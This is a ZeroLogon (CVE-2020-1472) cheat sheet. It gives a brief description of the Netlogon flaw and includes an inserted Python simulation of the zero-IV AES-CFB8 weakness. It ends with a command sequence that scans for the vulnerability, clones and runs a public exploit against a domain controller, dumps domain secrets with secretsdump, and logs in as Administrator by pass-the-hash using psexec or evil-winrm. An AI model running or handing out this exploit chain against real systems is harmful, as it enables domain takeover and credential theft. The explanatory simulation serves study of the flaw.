ZeroLogon - CVE-2020-1472
ZeroLogon exploits a feature of MS-NRPC (Microsoft Netlogon Remote Protocol), a critical Active Directory component that handles authentication of user and machine accounts. The attack is possible because the protocol's cryptography is implemented incorrectly.
Release Date: Sep, 2020
Impact: Elevation of Privilege
CVSS score: 10
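The cryptographic flaw referred to above is Netlogon's use of AES-CFB8 with a fixed all-zero IV when computing credentials. The sketch below is an added illustration, not code from this page or from the exploit repository: it assumes a SHA-256-based stand-in for AES (so it runs on the standard library alone) and constructed keys, and shows that with a fixed zero IV an all-zero input encrypts to all zeros for about 1 key in 256, while a per-message IV removes the effect.

```python
import hashlib

BLOCK = 16  # AES block size in bytes

def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES (assumption): a keyed pseudorandom function from SHA-256.
    CFB only ever calls the cipher in the encrypt direction, so a PRF
    reproduces the statistics that matter here."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB with 8-bit feedback: one block-cipher call per plaintext byte."""
    state, out = iv, bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, state)[0]  # keystream byte = first output byte
        out.append(c)
        state = state[1:] + bytes([c])        # shift the ciphertext byte into the register
    return bytes(out)

def constructed_key(i: int) -> bytes:
    """Constructed 16-byte test key number i (not real session keys)."""
    return hashlib.sha256(i.to_bytes(4, "big")).digest()[:16]

def zero_output_keys(n_keys: int, fixed_zero_iv: bool) -> int:
    """Count keys under which 8 zero plaintext bytes encrypt to 8 zero bytes."""
    hits = 0
    for i in range(n_keys):
        key = constructed_key(i)
        if fixed_zero_iv:
            iv = bytes(BLOCK)  # the weak setting: IV is always 16 zero bytes
        else:
            # corrected setting: a fresh IV per message (derived here so runs repeat)
            iv = hashlib.sha256(b"iv" + key).digest()[:BLOCK]
        if cfb8_encrypt(key, iv, bytes(8)) == bytes(8):
            hits += 1
    return hits

if __name__ == "__main__":
    n = 20000
    print("fixed zero IV :", zero_output_keys(n, True), "of", n, "keys (about n/256)")
    print("per-message IV:", zero_output_keys(n, False), "of", n, "keys")
```

With the zero IV, a zero first keystream byte leaves the shift register all zero, so every later byte repeats the same result; this is why the fix has to be applied on the domain controller and cannot be compensated for by stronger account passwords.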
# scan
nxc smb $ip -u $user -p $password -M zerologon
# exploit
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472/
python3 cve-2020-1472-exploit.py $dc_netbios_name $dc_ip
secretsdump.py -just-dc -no-pass $dc_netbios_name\$@$dc_ip
# extract administrator hash
# connect
psexec.py Administrator:@$dc_ip -hashes $hash_admin
evil-winrm -i $dc_ip -u Administrator -H $NTLM_hash